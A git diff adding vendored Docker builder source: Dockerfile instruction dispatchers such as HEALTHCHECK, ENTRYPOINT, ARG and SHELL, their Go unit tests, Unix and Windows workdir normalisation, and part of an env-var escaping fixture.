errAtLeastOneArgument("HEALTHCHECK") + } + typ := strings.ToUpper(args[0]) + args = args[1:] + if typ == "NONE" { + if len(args) != 0 { + return fmt.Errorf("HEALTHCHECK NONE takes no arguments") + } + test := strslice.StrSlice{typ} + b.runConfig.Healthcheck = &container.HealthConfig{ + Test: test, + } + } else { + if b.runConfig.Healthcheck != nil { + oldCmd := b.runConfig.Healthcheck.Test + if len(oldCmd) > 0 && oldCmd[0] != "NONE" { + fmt.Fprintf(b.Stdout, "Note: overriding previous HEALTHCHECK: %v\n", oldCmd) + } + } + + healthcheck := container.HealthConfig{} + + flInterval := b.flags.AddString("interval", "") + flTimeout := b.flags.AddString("timeout", "") + flRetries := b.flags.AddString("retries", "") + + if err := b.flags.Parse(); err != nil { + return err + } + + switch typ { + case "CMD": + cmdSlice := handleJSONArgs(args, attributes) + if len(cmdSlice) == 0 { + return fmt.Errorf("Missing command after HEALTHCHECK CMD") + } + + if !attributes["json"] { + typ = "CMD-SHELL" + } + + healthcheck.Test = strslice.StrSlice(append([]string{typ}, cmdSlice...)) + default: + return fmt.Errorf("Unknown type %#v in HEALTHCHECK (try CMD)", typ) + } + + interval, err := parseOptInterval(flInterval) + if err != nil { + return err + } + healthcheck.Interval = interval + + timeout, err := parseOptInterval(flTimeout) + if err != nil { + return err + } + healthcheck.Timeout = timeout + + if flRetries.Value != "" { + retries, err := strconv.ParseInt(flRetries.Value, 10, 32) + if err != nil { + return err + } + if retries < 1 { + return fmt.Errorf("--retries must be at least 1 (not %d)", retries) + } + healthcheck.Retries = int(retries) + } else { + healthcheck.Retries = 0 + } + + b.runConfig.Healthcheck = &healthcheck + } + + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("HEALTHCHECK %q", b.runConfig.Healthcheck)) +} + +// ENTRYPOINT /usr/sbin/nginx +// +// Set the entrypoint to /usr/sbin/nginx. Will accept the CMD as the arguments +// to /usr/sbin/nginx. Uses the default shell if not in JSON format. +// +// Handles command processing similar to CMD and RUN, only b.runConfig.Entrypoint +// is initialized at NewBuilder time instead of through argument parsing. +// +func entrypoint(b *Builder, args []string, attributes map[string]bool, original string) error { + if err := b.flags.Parse(); err != nil { + return err + } + + parsed := handleJSONArgs(args, attributes) + + switch { + case attributes["json"]: + // ENTRYPOINT ["echo", "hi"] + b.runConfig.Entrypoint = strslice.StrSlice(parsed) + case len(parsed) == 0: + // ENTRYPOINT [] + b.runConfig.Entrypoint = nil + default: + // ENTRYPOINT echo hi + b.runConfig.Entrypoint = strslice.StrSlice(append(getShell(b.runConfig), parsed[0])) + } + + // when setting the entrypoint if a CMD was not explicitly set then + // set the command to nil + if !b.cmdSet { + b.runConfig.Cmd = nil + } + + if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("ENTRYPOINT %q", b.runConfig.Entrypoint)); err != nil { + return err + } + + return nil +} + +// EXPOSE 6667/tcp 7000/tcp +// +// Expose ports for links and port mappings. This all ends up in +// b.runConfig.ExposedPorts for runconfig. +// +func expose(b *Builder, args []string, attributes map[string]bool, original string) error { + portsTab := args + + if len(args) == 0 { + return errAtLeastOneArgument("EXPOSE") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + if b.runConfig.ExposedPorts == nil { + b.runConfig.ExposedPorts = make(nat.PortSet) + } + + ports, _, err := nat.ParsePortSpecs(portsTab) + if err != nil { + return err + } + + // instead of using ports directly, we build a list of ports and sort it so + // the order is consistent. This prevents cache burst where map ordering + // changes between builds + portList := make([]string, len(ports)) + var i int + for port := range ports { + if _, exists := b.runConfig.ExposedPorts[port]; !exists { + b.runConfig.ExposedPorts[port] = struct{}{} + } + portList[i] = string(port) + i++ + } + sort.Strings(portList) + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("EXPOSE %s", strings.Join(portList, " "))) +} + +// USER foo +// +// Set the user to 'foo' for future commands and when running the +// ENTRYPOINT/CMD at container run time. +// +func user(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("USER") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + b.runConfig.User = args[0] + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("USER %v", args)) +} + +// VOLUME /foo +// +// Expose the volume /foo for use. Will also accept the JSON array form. +// +func volume(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) == 0 { + return errAtLeastOneArgument("VOLUME") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + if b.runConfig.Volumes == nil { + b.runConfig.Volumes = map[string]struct{}{} + } + for _, v := range args { + v = strings.TrimSpace(v) + if v == "" { + return fmt.Errorf("VOLUME specified can not be an empty string") + } + b.runConfig.Volumes[v] = struct{}{} + } + if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("VOLUME %v", args)); err != nil { + return err + } + return nil +} + +// STOPSIGNAL signal +// +// Set the signal that will be used to kill the container. +func stopSignal(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("STOPSIGNAL") + } + + sig := args[0] + _, err := signal.ParseSignal(sig) + if err != nil { + return err + } + + b.runConfig.StopSignal = sig + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("STOPSIGNAL %v", args)) +} + +// ARG name[=value] +// +// Adds the variable foo to the trusted list of variables that can be passed +// to builder using the --build-arg flag for expansion/subsitution or passing to 'run'. +// Dockerfile author may optionally set a default value of this variable. +func arg(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("ARG") + } + + var ( + name string + newValue string + hasDefault bool + ) + + arg := args[0] + // 'arg' can just be a name or name-value pair. Note that this is different + // from 'env' that handles the split of name and value at the parser level. + // The reason for doing it differently for 'arg' is that we support just + // defining an arg and not assign it a value (while 'env' always expects a + // name-value pair). If possible, it will be good to harmonize the two. + if strings.Contains(arg, "=") { + parts := strings.SplitN(arg, "=", 2) + if len(parts[0]) == 0 { + return errBlankCommandNames("ARG") + } + + name = parts[0] + newValue = parts[1] + hasDefault = true + } else { + name = arg + hasDefault = false + } + // add the arg to allowed list of build-time args from this step on. + b.allowedBuildArgs[name] = true + + // If there is a default value associated with this arg then add it to the + // b.buildArgs if one is not already passed to the builder. The args passed + // to builder override the default value of 'arg'. Note that a 'nil' for + // a value means that the user specified "--build-arg FOO" and "FOO" wasn't + // defined as an env var - and in that case we DO want to use the default + // value specified in the ARG cmd. + if baValue, ok := b.options.BuildArgs[name]; (!ok || baValue == nil) && hasDefault { + b.options.BuildArgs[name] = &newValue + } + + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ARG %s", arg)) +} + +// SHELL powershell -command +// +// Set the non-default shell to use. +func shell(b *Builder, args []string, attributes map[string]bool, original string) error { + if err := b.flags.Parse(); err != nil { + return err + } + shellSlice := handleJSONArgs(args, attributes) + switch { + case len(shellSlice) == 0: + // SHELL [] + return errAtLeastOneArgument("SHELL") + case attributes["json"]: + // SHELL ["powershell", "-command"] + b.runConfig.Shell = strslice.StrSlice(shellSlice) + default: + // SHELL powershell -command - not JSON + return errNotJSON("SHELL", original) + } + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("SHELL %v", shellSlice)) +} + +func errAtLeastOneArgument(command string) error { + return fmt.Errorf("%s requires at least one argument", command) +} + +func errExactlyOneArgument(command string) error { + return fmt.Errorf("%s requires exactly one argument", command) +} + +func errAtLeastTwoArguments(command string) error { + return fmt.Errorf("%s requires at least two arguments", command) +} + +func errBlankCommandNames(command string) error { + return fmt.Errorf("%s names can not be blank", command) +} + +func errTooManyArguments(command string) error { + return fmt.Errorf("Bad input to %s, too many arguments", command) +} + +// getShell is a helper function which gets the right shell for prefixing the +// shell-form of RUN, ENTRYPOINT and CMD instructions +func getShell(c *container.Config) []string { + if 0 == len(c.Shell) { + return defaultShell[:] + } + return c.Shell[:] +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go new file mode 100644 index 0000000000..f7c57f7e3b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go @@ -0,0 +1,517 @@ +package dockerfile + +import ( + "fmt" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/go-connections/nat" +) + +type commandWithFunction struct { + name string + function func(args []string) error +} + +func TestCommandsExactlyOneArgument(t *testing.T) { + commands := []commandWithFunction{ + {"MAINTAINER", func(args []string) error { return maintainer(nil, args, nil, "") }}, + {"FROM", func(args []string) error { return from(nil, args, nil, "") }}, + {"WORKDIR", func(args []string) error { return workdir(nil, args, nil, "") }}, + {"USER", func(args []string) error { return user(nil, args, nil, "") }}, + {"STOPSIGNAL", func(args []string) error { return stopSignal(nil, args, nil, "") }}} + + for _, command := range commands { + err := command.function([]string{}) + + if err == nil { + t.Fatalf("Error should be present for %s command", command.name) + } + + expectedError := errExactlyOneArgument(command.name) + + if err.Error() != expectedError.Error() { + t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) + } + } +} + +func TestCommandsAtLeastOneArgument(t *testing.T) { + commands := []commandWithFunction{ + {"ENV", func(args []string) error { return env(nil, args, nil, "") }}, + {"LABEL", func(args []string) error { return label(nil, args, nil, "") }}, + {"ONBUILD", func(args []string) error { return onbuild(nil, args, nil, "") }}, + {"HEALTHCHECK", func(args []string) error { return healthcheck(nil, args, nil, "") }}, + {"EXPOSE", func(args []string) error { return expose(nil, args, nil, "") }}, + {"VOLUME", func(args []string) error { return volume(nil, args, nil, "") }}} + + for _, command := range commands { + err := command.function([]string{}) + + if err == nil { + t.Fatalf("Error should be present for %s command", command.name) + } + + expectedError := errAtLeastOneArgument(command.name) + + if err.Error() != expectedError.Error() { + t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) + } + } +} + +func TestCommandsAtLeastTwoArguments(t *testing.T) { + commands := []commandWithFunction{ + {"ADD", func(args []string) error { return add(nil, args, nil, "") }}, + {"COPY", func(args []string) error { return dispatchCopy(nil, args, nil, "") }}} + + for _, command := range commands { + err := command.function([]string{"arg1"}) + + if err == nil { + t.Fatalf("Error should be present for %s command", command.name) + } + + expectedError := errAtLeastTwoArguments(command.name) + + if err.Error() != expectedError.Error() { + t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) + } + } +} + +func TestCommandsTooManyArguments(t *testing.T) { + commands := []commandWithFunction{ + {"ENV", func(args []string) error { return env(nil, args, nil, "") }}, + {"LABEL", func(args []string) error { return label(nil, args, nil, "") }}} + + for _, command := range commands { + err := command.function([]string{"arg1", "arg2", "arg3"}) + + if err == nil { + t.Fatalf("Error should be present for %s command", command.name) + } + + expectedError := errTooManyArguments(command.name) + + if err.Error() != expectedError.Error() { + t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) + } + } +} + +func TestCommandseBlankNames(t *testing.T) { + bflags := &BFlags{} + config := &container.Config{} + + b := &Builder{flags: bflags, runConfig: config, disableCommit: true} + + commands := []commandWithFunction{ + {"ENV", func(args []string) error { return env(b, args, nil, "") }}, + {"LABEL", func(args []string) error { return label(b, args, nil, "") }}, + } + + for _, command := range commands { + err := command.function([]string{"", ""}) + + if err == nil { + t.Fatalf("Error should be present for %s command", command.name) + } + + expectedError := errBlankCommandNames(command.name) + + if err.Error() != expectedError.Error() { + t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) + } + } +} + +func TestEnv2Variables(t *testing.T) { + variables := []string{"var1", "val1", "var2", "val2"} + + bflags := &BFlags{} + config := &container.Config{} + + b := &Builder{flags: bflags, runConfig: config, disableCommit: true} + + if err := env(b, variables, nil, ""); err != nil { + t.Fatalf("Error when executing env: %s", err.Error()) + } + + expectedVar1 := fmt.Sprintf("%s=%s", variables[0], variables[1]) + expectedVar2 := fmt.Sprintf("%s=%s", variables[2], variables[3]) + + if b.runConfig.Env[0] != expectedVar1 { + t.Fatalf("Wrong env output for first variable. Got: %s. Should be: %s", b.runConfig.Env[0], expectedVar1) + } + + if b.runConfig.Env[1] != expectedVar2 { + t.Fatalf("Wrong env output for second variable. Got: %s, Should be: %s", b.runConfig.Env[1], expectedVar2) + } +} + +func TestMaintainer(t *testing.T) { + maintainerEntry := "Some Maintainer " + + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + if err := maintainer(b, []string{maintainerEntry}, nil, ""); err != nil { + t.Fatalf("Error when executing maintainer: %s", err.Error()) + } + + if b.maintainer != maintainerEntry { + t.Fatalf("Maintainer in builder should be set to %s. Got: %s", maintainerEntry, b.maintainer) + } +} + +func TestLabel(t *testing.T) { + labelName := "label" + labelValue := "value" + + labelEntry := []string{labelName, labelValue} + + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + if err := label(b, labelEntry, nil, ""); err != nil { + t.Fatalf("Error when executing label: %s", err.Error()) + } + + if val, ok := b.runConfig.Labels[labelName]; ok { + if val != labelValue { + t.Fatalf("Label %s should have value %s, had %s instead", labelName, labelValue, val) + } + } else { + t.Fatalf("Label %s should be present but it is not", labelName) + } +} + +func TestFrom(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + err := from(b, []string{"scratch"}, nil, "") + + if runtime.GOOS == "windows" { + if err == nil { + t.Fatalf("Error not set on Windows") + } + + expectedError := "Windows does not support FROM scratch" + + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("Error message not correct on Windows. Should be: %s, got: %s", expectedError, err.Error()) + } + } else { + if err != nil { + t.Fatalf("Error when executing from: %s", err.Error()) + } + + if b.image != "" { + t.Fatalf("Image shoule be empty, got: %s", b.image) + } + + if b.noBaseImage != true { + t.Fatalf("Image should not have any base image, got: %v", b.noBaseImage) + } + } +} + +func TestOnbuildIllegalTriggers(t *testing.T) { + triggers := []struct{ command, expectedError string }{ + {"ONBUILD", "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed"}, + {"MAINTAINER", "MAINTAINER isn't allowed as an ONBUILD trigger"}, + {"FROM", "FROM isn't allowed as an ONBUILD trigger"}} + + for _, trigger := range triggers { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + err := onbuild(b, []string{trigger.command}, nil, "") + + if err == nil { + t.Fatalf("Error should not be nil") + } + + if !strings.Contains(err.Error(), trigger.expectedError) { + t.Fatalf("Error message not correct. Should be: %s, got: %s", trigger.expectedError, err.Error()) + } + } +} + +func TestOnbuild(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + err := onbuild(b, []string{"ADD", ".", "/app/src"}, nil, "ONBUILD ADD . /app/src") + + if err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + expectedOnbuild := "ADD . /app/src" + + if b.runConfig.OnBuild[0] != expectedOnbuild { + t.Fatalf("Wrong ONBUILD command. Expected: %s, got: %s", expectedOnbuild, b.runConfig.OnBuild[0]) + } +} + +func TestWorkdir(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + workingDir := "/app" + + if runtime.GOOS == "windows" { + workingDir = "C:\app" + } + + err := workdir(b, []string{workingDir}, nil, "") + + if err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.WorkingDir != workingDir { + t.Fatalf("WorkingDir should be set to %s, got %s", workingDir, b.runConfig.WorkingDir) + } + +} + +func TestCmd(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + command := "./executable" + + err := cmd(b, []string{command}, nil, "") + + if err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + var expectedCommand strslice.StrSlice + + if runtime.GOOS == "windows" { + expectedCommand = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", command)) + } else { + expectedCommand = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", command)) + } + + if !compareStrSlice(b.runConfig.Cmd, expectedCommand) { + t.Fatalf("Command should be set to %s, got %s", command, b.runConfig.Cmd) + } + + if !b.cmdSet { + t.Fatalf("Command should be marked as set") + } +} + +func compareStrSlice(slice1, slice2 strslice.StrSlice) bool { + if len(slice1) != len(slice2) { + return false + } + + for i := range slice1 { + if slice1[i] != slice2[i] { + return false + } + } + + return true +} + +func TestHealthcheckNone(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + if err := healthcheck(b, []string{"NONE"}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.Healthcheck == nil { + t.Fatal("Healthcheck should be set, got nil") + } + + expectedTest := strslice.StrSlice(append([]string{"NONE"})) + + if !compareStrSlice(expectedTest, b.runConfig.Healthcheck.Test) { + t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test) + } +} + +func TestHealthcheckCmd(t *testing.T) { + b := &Builder{flags: &BFlags{flags: make(map[string]*Flag)}, runConfig: &container.Config{}, disableCommit: true} + + if err := healthcheck(b, []string{"CMD", "curl", "-f", "http://localhost/", "||", "exit", "1"}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.Healthcheck == nil { + t.Fatal("Healthcheck should be set, got nil") + } + + expectedTest := strslice.StrSlice(append([]string{"CMD-SHELL"}, "curl -f http://localhost/ || exit 1")) + + if !compareStrSlice(expectedTest, b.runConfig.Healthcheck.Test) { + t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test) + } +} + +func TestEntrypoint(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + entrypointCmd := "/usr/sbin/nginx" + + if err := entrypoint(b, []string{entrypointCmd}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.Entrypoint == nil { + t.Fatalf("Entrypoint should be set") + } + + var expectedEntrypoint strslice.StrSlice + + if runtime.GOOS == "windows" { + expectedEntrypoint = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", entrypointCmd)) + } else { + expectedEntrypoint = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", entrypointCmd)) + } + + if !compareStrSlice(expectedEntrypoint, b.runConfig.Entrypoint) { + t.Fatalf("Entrypoint command should be set to %s, got %s", expectedEntrypoint, b.runConfig.Entrypoint) + } +} + +func TestExpose(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + exposedPort := "80" + + if err := expose(b, []string{exposedPort}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.ExposedPorts == nil { + t.Fatalf("ExposedPorts should be set") + } + + if len(b.runConfig.ExposedPorts) != 1 { + t.Fatalf("ExposedPorts should contain only 1 element. Got %s", b.runConfig.ExposedPorts) + } + + portsMapping, err := nat.ParsePortSpec(exposedPort) + + if err != nil { + t.Fatalf("Error when parsing port spec: %s", err.Error()) + } + + if _, ok := b.runConfig.ExposedPorts[portsMapping[0].Port]; !ok { + t.Fatalf("Port %s should be present. Got %s", exposedPort, b.runConfig.ExposedPorts) + } +} + +func TestUser(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + userCommand := "foo" + + if err := user(b, []string{userCommand}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.User != userCommand { + t.Fatalf("User should be set to %s, got %s", userCommand, b.runConfig.User) + } +} + +func TestVolume(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + exposedVolume := "/foo" + + if err := volume(b, []string{exposedVolume}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.Volumes == nil { + t.Fatalf("Volumes should be set") + } + + if len(b.runConfig.Volumes) != 1 { + t.Fatalf("Volumes should contain only 1 element. Got %s", b.runConfig.Volumes) + } + + if _, ok := b.runConfig.Volumes[exposedVolume]; !ok { + t.Fatalf("Volume %s should be present. Got %s", exposedVolume, b.runConfig.Volumes) + } +} + +func TestStopSignal(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + signal := "SIGKILL" + + if err := stopSignal(b, []string{signal}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.StopSignal != signal { + t.Fatalf("StopSignal should be set to %s, got %s", signal, b.runConfig.StopSignal) + } +} + +func TestArg(t *testing.T) { + buildOptions := &types.ImageBuildOptions{BuildArgs: make(map[string]*string)} + + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true, allowedBuildArgs: make(map[string]bool), options: buildOptions} + + argName := "foo" + argVal := "bar" + argDef := fmt.Sprintf("%s=%s", argName, argVal) + + if err := arg(b, []string{argDef}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + allowed, ok := b.allowedBuildArgs[argName] + + if !ok { + t.Fatalf("%s argument should be allowed as a build arg", argName) + } + + if !allowed { + t.Fatalf("%s argument was present in map but disallowed as a build arg", argName) + } + + val, ok := b.options.BuildArgs[argName] + + if !ok { + t.Fatalf("%s argument should be a build arg", argName) + } + + if *val != "bar" { + t.Fatalf("%s argument should have default value 'bar', got %s", argName, val) + } +} + +func TestShell(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + shellCmd := "powershell" + + attrs := make(map[string]bool) + attrs["json"] = true + + if err := shell(b, []string{shellCmd}, attrs, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.Shell == nil { + t.Fatalf("Shell should be set") + } + + expectedShell := strslice.StrSlice([]string{shellCmd}) + + if !compareStrSlice(expectedShell, b.runConfig.Shell) { + t.Fatalf("Shell should be set to %s, got %s", expectedShell, b.runConfig.Shell) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go new file mode 100644 index 0000000000..8b0dfc3911 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go @@ -0,0 +1,27 @@ +// +build !windows + +package dockerfile + +import ( + "fmt" + "os" + "path/filepath" +) + +// normaliseWorkdir normalises a user requested working directory in a +// platform sematically consistent way. +func normaliseWorkdir(current string, requested string) (string, error) { + if requested == "" { + return "", fmt.Errorf("cannot normalise nothing") + } + current = filepath.FromSlash(current) + requested = filepath.FromSlash(requested) + if !filepath.IsAbs(requested) { + return filepath.Join(string(os.PathSeparator), current, requested), nil + } + return requested, nil +} + +func errNotJSON(command, _ string) error { + return fmt.Errorf("%s requires the arguments to be in JSON form", command) +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go new file mode 100644 index 0000000000..4aae6b460e --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go @@ -0,0 +1,33 @@ +// +build !windows + +package dockerfile + +import ( + "testing" +) + +func TestNormaliseWorkdir(t *testing.T) { + testCases := []struct{ current, requested, expected, expectedError string }{ + {``, ``, ``, `cannot normalise nothing`}, + {``, `foo`, `/foo`, ``}, + {``, `/foo`, `/foo`, ``}, + {`/foo`, `bar`, `/foo/bar`, ``}, + {`/foo`, `/bar`, `/bar`, ``}, + } + + for _, test := range testCases { + normalised, err := normaliseWorkdir(test.current, test.requested) + + if test.expectedError != "" && err == nil { + t.Fatalf("NormaliseWorkdir should return an error %s, got nil", test.expectedError) + } + + if test.expectedError != "" && err.Error() != test.expectedError { + t.Fatalf("NormaliseWorkdir returned wrong error. Expected %s, got %s", test.expectedError, err.Error()) + } + + if normalised != test.expected { + t.Fatalf("NormaliseWorkdir error. Expected %s for current %s and requested %s, got %s", test.expected, test.current, test.requested, normalised) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go new file mode 100644 index 0000000000..e890c3ae18 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go @@ -0,0 +1,86 @@ +package dockerfile + +import ( + "fmt" + "os" + "path/filepath" + "regexp" + "strings" + + "github.com/docker/docker/pkg/system" +) + +var pattern = regexp.MustCompile(`^[a-zA-Z]:\.$`) + +// normaliseWorkdir normalises a user requested working directory in a +// platform sematically consistent way. +func normaliseWorkdir(current string, requested string) (string, error) { + if requested == "" { + return "", fmt.Errorf("cannot normalise nothing") + } + + // `filepath.Clean` will replace "" with "." so skip in that case + if current != "" { + current = filepath.Clean(current) + } + if requested != "" { + requested = filepath.Clean(requested) + } + + // If either current or requested in Windows is: + // C: + // C:. + // then an error will be thrown as the definition for the above + // refers to `current directory on drive C:` + // Since filepath.Clean() will automatically normalize the above + // to `C:.`, we only need to check the last format + if pattern.MatchString(current) { + return "", fmt.Errorf("%s is not a directory. If you are specifying a drive letter, please add a trailing '\\'", current) + } + if pattern.MatchString(requested) { + return "", fmt.Errorf("%s is not a directory. If you are specifying a drive letter, please add a trailing '\\'", requested) + } + + // Target semantics is C:\somefolder, specifically in the format: + // UPPERCASEDriveLetter-Colon-Backslash-FolderName. We are already + // guaranteed that `current`, if set, is consistent. This allows us to + // cope correctly with any of the following in a Dockerfile: + // WORKDIR a --> C:\a + // WORKDIR c:\\foo --> C:\foo + // WORKDIR \\foo --> C:\foo + // WORKDIR /foo --> C:\foo + // WORKDIR c:\\foo \ WORKDIR bar --> C:\foo --> C:\foo\bar + // WORKDIR C:/foo \ WORKDIR bar --> C:\foo --> C:\foo\bar + // WORKDIR C:/foo \ WORKDIR \\bar --> C:\foo --> C:\bar + // WORKDIR /foo \ WORKDIR c:/bar --> C:\foo --> C:\bar + if len(current) == 0 || system.IsAbs(requested) { + if (requested[0] == os.PathSeparator) || + (len(requested) > 1 && string(requested[1]) != ":") || + (len(requested) == 1) { + requested = filepath.Join(`C:\`, requested) + } + } else { + requested = filepath.Join(current, requested) + } + // Upper-case drive letter + return (strings.ToUpper(string(requested[0])) + requested[1:]), nil +} + +func errNotJSON(command, original string) error { + // For Windows users, give a hint if it looks like it might contain + // a path which hasn't been escaped such as ["c:\windows\system32\prog.exe", "-param"], + // as JSON must be escaped. Unfortunate... + // + // Specifically looking for quote-driveletter-colon-backslash, there's no + // double backslash and a [] pair. No, this is not perfect, but it doesn't + // have to be. It's simply a hint to make life a little easier. + extra := "" + original = filepath.FromSlash(strings.ToLower(strings.Replace(strings.ToLower(original), strings.ToLower(command)+" ", "", -1))) + if len(regexp.MustCompile(`"[a-z]:\\.*`).FindStringSubmatch(original)) > 0 && + !strings.Contains(original, `\\`) && + strings.Contains(original, "[") && + strings.Contains(original, "]") { + extra = fmt.Sprintf(`. It looks like '%s' includes a file path without an escaped back-slash. JSON requires back-slashes to be escaped such as ["c:\\path\\to\\file.exe", "/parameter"]`, original) + } + return fmt.Errorf("%s requires the arguments to be in JSON form%s", command, extra) +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go new file mode 100644 index 0000000000..3319c06582 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go @@ -0,0 +1,40 @@ +// +build windows + +package dockerfile + +import "testing" + +func TestNormaliseWorkdir(t *testing.T) { + tests := []struct{ current, requested, expected, etext string }{ + {``, ``, ``, `cannot normalise nothing`}, + {``, `C:`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {``, `C:.`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {`c:`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {`c:.`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {``, `a`, `C:\a`, ``}, + {``, `c:\foo`, `C:\foo`, ``}, + {``, `c:\\foo`, `C:\foo`, ``}, + {``, `\foo`, `C:\foo`, ``}, + {``, `\\foo`, `C:\foo`, ``}, + {``, `/foo`, `C:\foo`, ``}, + {``, `C:/foo`, `C:\foo`, ``}, + {`C:\foo`, `bar`, `C:\foo\bar`, ``}, + {`C:\foo`, `/bar`, `C:\bar`, ``}, + {`C:\foo`, `\bar`, `C:\bar`, ``}, + } + for _, i := range tests { + r, e := normaliseWorkdir(i.current, i.requested) + + if i.etext != "" && e == nil { + t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got no error", i.etext, i.current, i.requested) + } + + if i.etext != "" && e.Error() != i.etext { + t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got %s", i.etext, i.current, i.requested, e.Error()) + } + + if r != i.expected { + t.Fatalf("TestNormaliseWorkingDir Expected '%s' for '%s' '%s', got '%s'", i.expected, i.current, i.requested, r) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/envVarTest b/vendor/github.com/docker/docker/builder/dockerfile/envVarTest new file mode 100644 index 0000000000..067dca9a54 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/envVarTest @@ -0,0 +1,116 @@ +A|hello | hello +A|he'll'o | hello +A|he'llo | hello +A|he\'llo | he'llo +A|he\\'llo | he\llo +A|abc\tdef | abctdef +A|"abc\tdef" | abc\tdef +A|'abc\tdef' | abc\tdef +A|hello\ | hello +A|hello\\ | hello\ 